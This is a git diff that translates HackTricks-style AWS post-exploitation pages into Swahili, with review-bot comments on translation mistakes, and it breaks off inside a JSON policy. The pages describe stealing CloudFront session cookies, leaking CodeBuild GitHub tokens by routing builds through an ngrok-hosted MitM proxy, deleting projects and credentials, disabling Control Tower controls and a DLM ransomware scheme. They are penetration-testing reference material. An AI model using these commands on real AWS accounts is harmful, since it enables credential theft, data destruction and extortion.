@@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp
# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
```
-
-**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
+**Madhara Yanayoweza Kutokea**: Ufikiaji usioidhinishwa wa rasilimali za API, kupita kwenye udhibiti wa usalama.
> [!NOTE]
-> Need testing
+> Inahitaji kupimwa
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
index 4a3c4ff21..549d88a29 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
@@ -4,7 +4,7 @@
## CloudFront
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-cloudfront-enum.md
@@ -12,24 +12,20 @@ For more information check:
### Man-in-the-Middle
-This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+Hii [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) inapendekeza hali kadhaa tofauti ambapo **Lambda** inaweza kuongezwa (au kubadilishwa ikiwa tayari inatumika) katika **mawasiliano kupitia CloudFront** kwa lengo la **kuiba** taarifa za mtumiaji (kama **cookie** ya kikao) na **kubadilisha** **jibu** (kuingiza script mbaya ya JS).
-#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+#### scenario 1: MitM ambapo CloudFront imewekwa kufikia HTML fulani ya bucket
-- **Create** the malicious **function**.
-- **Associate** it with the CloudFront distribution.
-- Set the **event type to "Viewer Response"**.
+- **Unda** **function** mbaya.
+- **Unganisha** na usambazaji wa CloudFront.
+- Weka **aina ya tukio kuwa "Viewer Response"**.
-Accessing the response you could steal the users cookie and inject a malicious JS.
+Kwa kufikia jibu unaweza kuiba cookie za watumiaji na kuingiza JS mbaya.
-#### scenario 2: MitM where CloudFront is already using a lambda function
+#### scenario 2: MitM ambapo CloudFront tayari inatumia kazi ya lambda
-- **Modify the code** of the lambda function to steal sensitive information
+- **Badilisha msimbo** wa kazi ya lambda ili kuiba taarifa nyeti
-You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+Unaweza kuangalia [**msimbo wa tf ili kuunda hali hizi hapa**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
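Review bot: the term for Lambda is inconsistent inside the hunk: scenario 1 keeps `**function**` in English (`- **Unda** **function** mbaya.`) while the scenario 2 heading and bullet render it as `kazi ya lambda`, which reads as "the lambda's work/task". Use one term in both scenarios, for example leaving `Lambda function` untranslated as scenario 1 already does. The event type `"Viewer Response"` and the link targets are kept intact, which is correct.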
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
index 54be4e299..a0535b447 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -4,85 +4,73 @@
## CodeBuild
-For more information, check:
+Kwa maelezo zaidi, angalia:
{{#ref}}
../../aws-services/aws-codebuild-enum.md
{{#endref}}
-### Check Secrets
+### Angalia Siri
-If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
-Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+Ikiwa akidi zimewekwa katika Codebuild kuungana na Github, Gitlab au Bitbucket kwa njia ya alama za kibinafsi, nywila au ufikiaji wa alama za OAuth, hizi **akidi zitawekwa kama siri katika meneja wa siri**.\
+Hivyo, ikiwa una ufikiaji wa kusoma meneja wa siri utaweza kupata hizi siri na kuhamasisha kwenye jukwaa lililounganishwa.
{{#ref}}
../../aws-privilege-escalation/aws-secrets-manager-privesc.md
{{#endref}}
-### Abuse CodeBuild Repo Access
+### Tumia Upatikanaji wa Repo ya CodeBuild
-In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+Ili kuunda **CodeBuild**, itahitaji **ufikiaji wa repo ya msimbo** ambayo itakuwa ikitumia. Jukwaa kadhaa zinaweza kuwa zinahifadhi msimbo huu:
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+Mradi wa **CodeBuild lazima uwe na ufikiaji** wa mtoa huduma wa chanzo ulioanzishwa, ama kupitia **IAM role** au kwa kutumia **token ya github/bitbucket au ufikiaji wa OAuth**.
-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+Mshambuliaji mwenye **idhini za juu katika CodeBuild** anaweza kutumia ufikiaji huu ulioanzishwa kuvuja msimbo wa repo iliyoanzishwa na zingine ambapo akidi zilizowekwa zina ufikiaji.\
+Ili kufanya hivyo, mshambuliaji atahitaji tu **kubadilisha URL ya hifadhi kwa kila repo ambayo akidi za usanidi zina ufikiaji** (kumbuka kwamba wavuti ya aws itataja zote kwako):
-And **change the Buildspec commands to exfiltrate each repo**.
+Na **kubadilisha amri za Buildspec ili kuhamasisha kila repo**.
> [!WARNING]
-> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
-> Or does he? Check the next section
+> Hata hivyo, hii **kazi ni ya kurudiwa na inachosha** na ikiwa token ya github ilipangwa na **idhini za kuandika**, mshambuliaji **hataweza (ku) kutumia hizo idhini** kwani hana ufikiaji wa token hiyo.\
+> Au ana? Angalia sehemu inayofuata
-### Leaking Access Tokens from AWS CodeBuild
-
-You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+### Kuvaa Alama za Ufikiaji kutoka AWS CodeBuild
+Unaweza kuvuja ufikiaji uliopewa katika CodeBuild kwa jukwaa kama Github. Angalia ikiwa ufikiaji wowote kwa jukwaa za nje ulitolewa kwa:
```bash
aws codebuild list-source-credentials
```
-
{{#ref}}
aws-codebuild-token-leakage.md
{{#endref}}
### `codebuild:DeleteProject`
-An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
-
+Mshambuliaji anaweza kufuta mradi mzima wa CodeBuild, na kusababisha kupoteza usanidi wa mradi na kuathiri programu zinazotegemea mradi huo.
```bash
aws codebuild delete-project --name
```
-
-**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+**Madhara Yanayoweza Kutokea**: Kupoteza usanidi wa mradi na usumbufu wa huduma kwa programu zinazotumia mradi uliofutwa.
### `codebuild:TagResource` , `codebuild:UntagResource`
-An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+Mshambuliaji anaweza kuongeza, kubadilisha, au kuondoa lebo kutoka kwa rasilimali za CodeBuild, akisababisha usumbufu katika ugawaji wa gharama wa shirika lako, ufuatiliaji wa rasilimali, na sera za udhibiti wa ufikiaji kulingana na lebo.
```bash
aws codebuild tag-resource --resource-arn --tags
aws codebuild untag-resource --resource-arn --tag-keys
```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Madhara Yanayoweza Kutokea**: Kuingiliwa kwa ugawaji wa gharama, ufuatiliaji wa rasilimali, na sera za udhibiti wa ufikiaji kulingana na lebo.
### `codebuild:DeleteSourceCredentials`
-An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
-
+Mshambuliaji anaweza kufuta akiba za chanzo kwa ajili ya ghala la Git, na kuathiri utendaji wa kawaida wa programu zinazotegemea ghala hilo.
```sql
aws codebuild delete-source-credentials --arn
```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+**Madhara Yanayoweza Kutokea**: Kuingiliwa kwa utendaji wa kawaida wa programu zinazotegemea hazina iliyoathirika kutokana na kuondolewa kwa hati za chanzo.
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
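Review bot: the heading `### Kuvaa Alama za Ufikiaji kutoka AWS CodeBuild` mistranslates "Leaking Access Tokens": `Kuvaa` means "to wear", and the very next line already uses `kuvuja` (leak), so the heading should read `Kuvuja Token za Ufikiaji kutoka AWS CodeBuild`. Related verb slips in the same hunk: `kuhamasisha kwenye jukwaa` (for "pivot to") and `kuhamasisha kila repo` (for "exfiltrate each repo") use a verb meaning "to motivate/mobilize"; "pivot" is `kuhamia`, and "exfiltrate" is `kuvuja` as used elsewhere on the page. Credential terminology also drifts within the hunk (`akidi`, `akiba za chanzo`, `hati za chanzo`); `akiba` means "savings/reserve", so settle on `akidi` or the untranslated `credentials`. While here, the unchanged context fence tagged `sql` around `aws codebuild delete-source-credentials --arn` should be tagged `bash` like the other CLI blocks.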
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
index c514d7a7c..37e283bc5 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -4,71 +4,66 @@
## Recover Github/Bitbucket Configured Tokens
-First, check if there are any source credentials configured that you could leak:
-
+Kwanza, angalia kama kuna akauti za chanzo zilizowekwa ambazo unaweza kuvuja:
```bash
aws codebuild list-source-credentials
```
-
### Via Docker Image
-If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
+Ikiwa unapata kuwa uthibitisho kwa mfano Github umewekwa katika akaunti, unaweza **kuondoa** hiyo **ufikiaji** (**GH token au OAuth token**) kwa kufanya Codebuild **itumie picha maalum ya docker** kuendesha ujenzi wa mradi.
-For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
+Kwa kusudi hili unaweza **kuunda mradi mpya wa Codebuild** au kubadilisha **mazingira** ya moja iliyopo ili kuweka **picha ya Docker**.
-The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
+Picha ya Docker unayoweza kutumia ni [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). Hii ni picha ya Docker ya msingi sana ambayo itaweka **env variables `https_proxy`**, **`http_proxy`** na **`SSL_CERT_FILE`**. Hii itakuruhusu kukamata sehemu kubwa ya trafiki ya mwenyeji iliyoonyeshwa katika **`https_proxy`** na **`http_proxy`** na kuamini SSL CERT iliyoonyeshwa katika **`SSL_CERT_FILE`**.
-1. **Create & Upload your own Docker MitM image**
- - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
- - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
- - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
- - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
-2. **Set the environment**
- - Create a **new Codebuild project** or **modify** the environment of an existing one.
- - Set the project to use the **previously generated Docker image**
+1. **Unda & Pakia picha yako ya Docker MitM**
+- Fuata maelekezo ya repo kuweka anwani yako ya IP ya proxy na kuweka cheti chako cha SSL na **ujenge picha ya docker**.
+- **USIWEKE `http_proxy`** ili usikamate maombi kwa kiungo cha metadata.
+- Unaweza kutumia **`ngrok`** kama `ngrok tcp 4444` kuweka proxy kwa mwenyeji wako.
+- Mara tu unapokuwa na picha ya Docker iliyojengwa, **paki kwenye repo ya umma** (Dockerhub, ECR...)
+2. **Weka mazingira**
+- Unda **mradi mpya wa Codebuild** au **badilisha** mazingira ya moja iliyopo.
+- Weka mradi kutumia **picha ya Docker iliyozalishwa awali**
-3. **Set the MitM proxy in your host**
-
-- As indicated in the **Github repo** you could use something like:
+3. **Weka proxy ya MitM katika mwenyeji wako**
+- Kama ilivyoonyeshwa katika **repo ya Github** unaweza kutumia kitu kama:
```bash
mitmproxy --listen-port 4444 --allow-hosts "github.com"
```
-
> [!TIP]
-> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+> The **mitmproxy version used was 9.0.1**, iliripotiwa kwamba na toleo la 10 hii inaweza isifanye kazi.
-4. **Run the build & capture the credentials**
+4. **Kimbia ujenzi & kamata akreditivu**
-- You can see the token in the **Authorization** header:
+- Unaweza kuona token katika kichwa cha **Authorization**:
-
-
-This could also be done from the aws cli with something like
+
+Hii pia inaweza kufanywa kutoka kwa aws cli na kitu kama
```bash
# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
## With /tmp/buildspec.json
{
- "name": "my-demo-project",
- "source": {
- "type": "GITHUB",
- "location": "https://github.com/uname/repo",
- "buildspec": "buildspec.yml"
- },
- "artifacts": {
- "type": "NO_ARTIFACTS"
- },
- "environment": {
- "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
- "image": "docker.io/carlospolop/docker-mitm:v12",
- "computeType": "BUILD_GENERAL1_SMALL",
- "imagePullCredentialsType": "CODEBUILD"
- }
+"name": "my-demo-project",
+"source": {
+"type": "GITHUB",
+"location": "https://github.com/uname/repo",
+"buildspec": "buildspec.yml"
+},
+"artifacts": {
+"type": "NO_ARTIFACTS"
+},
+"environment": {
+"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
+"image": "docker.io/carlospolop/docker-mitm:v12",
+"computeType": "BUILD_GENERAL1_SMALL",
+"imagePullCredentialsType": "CODEBUILD"
+}
}
## Json
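Review bot: the numbered procedure loses its nesting: the sub-bullets under `1. **Unda & Pakia picha yako ya Docker MitM**` and `2. **Weka mazingira**` were indented under their numbered items and are now at column 0, so Markdown renders them as separate top-level bullet lists and closes the ordered list after each item. Restore the indentation (three spaces, as in the removed lines). The JSON in the `/tmp/buildspec.json` block was flattened to column 0 as well; it still parses, but keep the original indentation for readability. Wording: the TIP is only half translated (`The **mitmproxy version used was 9.0.1**, iliripotiwa kwamba ...`); `akauti za chanzo` for "source credentials" reads as "source accounts" (and is misspelled) where `akidi za chanzo` is used elsewhere in this patch; and `Kimbia ujenzi` for "Run the build" uses a verb meaning "run away", whereas the next hunk uses `endesha`, which is the right one.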
@@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
# Start the build
aws codebuild start-build --project-name my-project2
```
-
### Via insecureSSL
-**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
-Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
-
-- First you need to enumerate the current configuration with something like:
+**Codebuild** miradi ina mipangilio inayoitwa **`insecureSsl`** ambayo imefichwa kwenye wavuti unaweza kubadilisha tu kutoka kwa API.\
+Kuwezesha hili, inaruhusu Codebuild kuungana na hifadhi **bila kuangalia cheti** kinachotolewa na jukwaa.
+- Kwanza unahitaji kuorodhesha usanidi wa sasa kwa kutumia kitu kama:
```bash
aws codebuild batch-get-projects --name
```
-
-- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
- - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:
-
+- Kisha, kwa taarifa ulizokusanya unaweza kuboresha mipangilio ya mradi **`insecureSsl`** kuwa **`True`**. Ifuatayo ni mfano wa jinsi nilivyoboresha mradi, angalia **`insecureSsl=True`** mwishoni (hii ndiyo kitu pekee unachohitaji kubadilisha kutoka kwenye usanidi ulio kusanya).
+- Zaidi ya hayo, ongeza pia mabadiliko ya mazingira **http_proxy** na **https_proxy** yanayoelekeza kwenye tcp ngrok yako kama:
```bash
aws codebuild update-project --name \
- --source '{
- "type": "GITHUB",
- "location": "https://github.com/carlospolop/404checker",
- "gitCloneDepth": 1,
- "gitSubmodulesConfig": {
- "fetchSubmodules": false
- },
- "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
- "auth": {
- "type": "CODECONNECTIONS",
- "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
- },
- "reportBuildStatus": false,
- "insecureSsl": true
- }' \
- --environment '{
- "type": "LINUX_CONTAINER",
- "image": "aws/codebuild/standard:5.0",
- "computeType": "BUILD_GENERAL1_SMALL",
- "environmentVariables": [
- {
- "name": "http_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- },
- {
- "name": "https_proxy",
- "value": "http://2.tcp.eu.ngrok.io:15027"
- }
- ]
- }'
+--source '{
+"type": "GITHUB",
+"location": "https://github.com/carlospolop/404checker",
+"gitCloneDepth": 1,
+"gitSubmodulesConfig": {
+"fetchSubmodules": false
+},
+"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
+"auth": {
+"type": "CODECONNECTIONS",
+"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
+},
+"reportBuildStatus": false,
+"insecureSsl": true
+}' \
+--environment '{
+"type": "LINUX_CONTAINER",
+"image": "aws/codebuild/standard:5.0",
+"computeType": "BUILD_GENERAL1_SMALL",
+"environmentVariables": [
+{
+"name": "http_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+},
+{
+"name": "https_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+}
+]
+}'
```
-
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Kisha,endesha mfano wa msingi kutoka [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) katika bandari iliyoonyeshwa na mabadiliko ya proxy (http_proxy na https_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
- host="127.0.0.1",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
+host="127.0.0.1",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
-
-- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Hatimaye, bonyeza **Jenga mradi**, **vithibitisho** vitatumwa kwa **maandishi wazi** (base64) kwenye bandari ya mitm:
-### ~~Via HTTP protocol~~
+### ~~Kupitia itifaki ya HTTP~~
-> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+> [!TIP] > **Ukatili huu ulirekebishwa na AWS wakati fulani katika wiki ya 20 ya Februari ya 2023 (nadhani Ijumaa). Hivyo, mshambuliaji hawezi kuutumia tena :)**
-An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+Mshambuliaji mwenye **idhini za juu katika CodeBuild anaweza kuvuja token ya Github/Bitbucket** iliyowekwa au ikiwa idhini ilipangwa kupitia OAuth, **token ya muda ya OAuth inayotumika kufikia msimbo**.
-- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
+- Mshambuliaji anaweza kuongeza mabadiliko ya mazingira **http_proxy** na **https_proxy** kwenye mradi wa CodeBuild ukielekeza kwenye mashine yake (kwa mfano `http://5.tcp.eu.ngrok.io:14972`).
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Kisha, badilisha URL ya repo ya github kutumia HTTP badala ya HTTPS, kwa mfano: `http://github.com/carlospolop-forks/TestActions`
+- Kisha, endesha mfano wa msingi kutoka [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) kwenye bandari iliyotajwa na mabadiliko ya proxy (http_proxy na https_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
- host="0.0.0.0",
- port=4444,
- protocols=[protocol.HTTP],
- middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
- certificate_authority = crypto.CertificateAuthority()
+host="0.0.0.0",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
-
-- Next, click on **Build the project** or start the build from command line:
-
+- Kisha, bonyeza **Build the project** au anza ujenzi kutoka kwa mstari wa amri:
```sh
aws codebuild start-build --project-name
```
-
-- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Hatimaye, **credentials** zitatumwa kwa **clear text** (base64) kwenye bandari ya mitm:
> [!WARNING]
-> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
+> Sasa mshambuliaji ataweza kutumia token kutoka kwa mashine yake, kuorodhesha haki zote alizo nazo na (ku)zitumia kwa urahisi zaidi kuliko kutumia huduma ya CodeBuild moja kwa moja.
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
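Review bot: `Ukatili huu ulirekebishwa na AWS` renders "This vulnerability was corrected" with a word meaning "cruelty/brutality"; use `Udhaifu huu` (vulnerability). The two Python blocks lose the indentation of the `MITM(...)` keyword arguments (`host=`, `port=`, `protocols=` now at column 0 inside the call); Python accepts any indentation inside parentheses so the snippet still runs, but keep the original layout, and the same applies to the flattened JSON inside the `aws codebuild update-project` command. Credential terminology varies again within the hunk (`vithibitisho` in the insecureSsl steps, untranslated `credentials` in the HTTP-protocol steps); pick one. Also `Kisha,endesha` is missing the space after the comma.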
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
index f1c6fb394..dd9041283 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
@@ -8,17 +8,11 @@
../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
{{#endref}}
-### Enable / Disable Controls
-
-To further exploit an account, you might need to disable/enable Control Tower controls:
+### Wezesha / Zima Mifumo
+Ili kuendelea kutumia akaunti, unaweza kuhitaji kuzima/kuwezesha mifumo ya Control Tower:
```bash
aws controltower disable-control --control-identifier --target-identifier
aws controltower enable-control --control-identifier --target-identifier
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
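Review bot: `### Wezesha / Zima Mifumo` renders "Controls" as "Mifumo" (systems), but "controls" is the Control Tower product term that the CLI mirrors in `--control-identifier`; keep the English word in the heading (for example `### Wezesha / Zima Controls`) so a reader can match the heading to the `aws controltower disable-control` / `enable-control` commands below it. The blank line between the heading and the paragraph was also removed; harmless for rendering, but an unneeded change in a diff that is meant only to translate.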
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
index baa309e53..e9b4dfbe4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -6,94 +6,86 @@
### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
-A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+Shambulio la ransomware linaweza kutekelezwa kwa kuficha kiasi cha EBS volumes kadri iwezekanavyo na kisha kufuta EC2 instances, EBS volumes, na snapshots za sasa. Ili kuendesha shughuli hii mbaya, mtu anaweza kutumia Amazon DLM, akificha snapshots kwa kutumia funguo za KMS kutoka akaunti nyingine ya AWS na kuhamasisha snapshots zilizofichwa kwa akaunti tofauti. Vinginevyo, wanaweza kuhamasisha snapshots bila kuficha kwa akaunti wanayosimamia na kisha kuzificha huko. Ingawa si rahisi kuficha EBS volumes au snapshots zilizopo moja kwa moja, inawezekana kufanya hivyo kwa kuunda volume au snapshot mpya.
-Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+Kwanza, mtu atatumia amri kukusanya taarifa kuhusu volumes, kama vile ID ya instance, ID ya volume, hali ya ufichaji, hali ya kiambatisho, na aina ya volume.
`aws ec2 describe-volumes`
-Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
-
+Pili, mtu ataunda sera ya mzunguko wa maisha. Amri hii inatumia DLM API kuanzisha sera ya mzunguko wa maisha ambayo inachukua snapshots za kila siku za volumes zilizotajwa kwa wakati ulioainishwa. Pia inatumia lebo maalum kwa snapshots na nakala za lebo kutoka kwa volumes hadi snapshots. Faili ya policyDetails.json inajumuisha maelezo ya sera ya mzunguko wa maisha, kama vile lebo za lengo, ratiba, ARN ya funguo ya KMS ya hiari kwa ufichaji, na akaunti ya lengo kwa ajili ya kushiriki snapshots, ambayo itarekodiwa katika kumbukumbu za CloudTrail za mwathirika.
```bash
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
```
-
-A template for the policy document can be seen here:
-
+Template ya hati ya sera inaweza kuonekana hapa:
```bash
{
- "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
- "ResourceTypes": [
- "VOLUME"
- ],
- "TargetTags": [
- {
- "Key": "ExampleKey",
- "Value": "ExampleValue"
- }
- ],
- "Schedules": [
- {
- "Name": "DailySnapshots",
- "CopyTags": true,
- "TagsToAdd": [
- {
- "Key": "SnapshotCreator",
- "Value": "DLM"
- }
- ],
- "VariableTags": [
- {
- "Key": "CostCenter",
- "Value": "Finance"
- }
- ],
- "CreateRule": {
- "Interval": 24,
- "IntervalUnit": "HOURS",
- "Times": [
- "03:00"
- ]
- },
- "RetainRule": {
- "Count": 14
- },
- "FastRestoreRule": {
- "Count": 2,
- "Interval": 12,
- "IntervalUnit": "HOURS"
- },
- "CrossRegionCopyRules": [
- {
- "TargetRegion": "us-west-2",
- "Encrypted": true,
- "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
- "CopyTags": true,
- "RetainRule": {
- "Interval": 1,
- "IntervalUnit": "DAYS"
- }
- }
- ],
- "ShareRules": [
- {
- "TargetAccounts": [
- "123456789012"
- ],
- "UnshareInterval": 30,
- "UnshareIntervalUnit": "DAYS"
- }
- ]
- }
- ],
- "Parameters": {
- "ExcludeBootVolume": false
- }
+"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+"ResourceTypes": [
+"VOLUME"
+],
+"TargetTags": [
+{
+"Key": "ExampleKey",
+"Value": "ExampleValue"
+}
+],
+"Schedules": [
+{
+"Name": "DailySnapshots",
+"CopyTags": true,
+"TagsToAdd": [
+{
+"Key": "SnapshotCreator",
+"Value": "DLM"
+}
+],
+"VariableTags": [
+{
+"Key": "CostCenter",
+"Value": "Finance"
+}
+],
+"CreateRule": {
+"Interval": 24,
+"IntervalUnit": "HOURS",
+"Times": [
+"03:00"
+]
+},
+"RetainRule": {
+"Count": 14
+},
+"FastRestoreRule": {
+"Count": 2,
+"Interval": 12,
+"IntervalUnit": "HOURS"
+},
+"CrossRegionCopyRules": [
+{
+"TargetRegion": "us-west-2",
+"Encrypted": true,
+"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+"CopyTags": true,
+"RetainRule": {
+"Interval": 1,
+"IntervalUnit": "DAYS"
+}
+}
+],
+"ShareRules": [
+{
+"TargetAccounts": [
+"123456789012"
+],
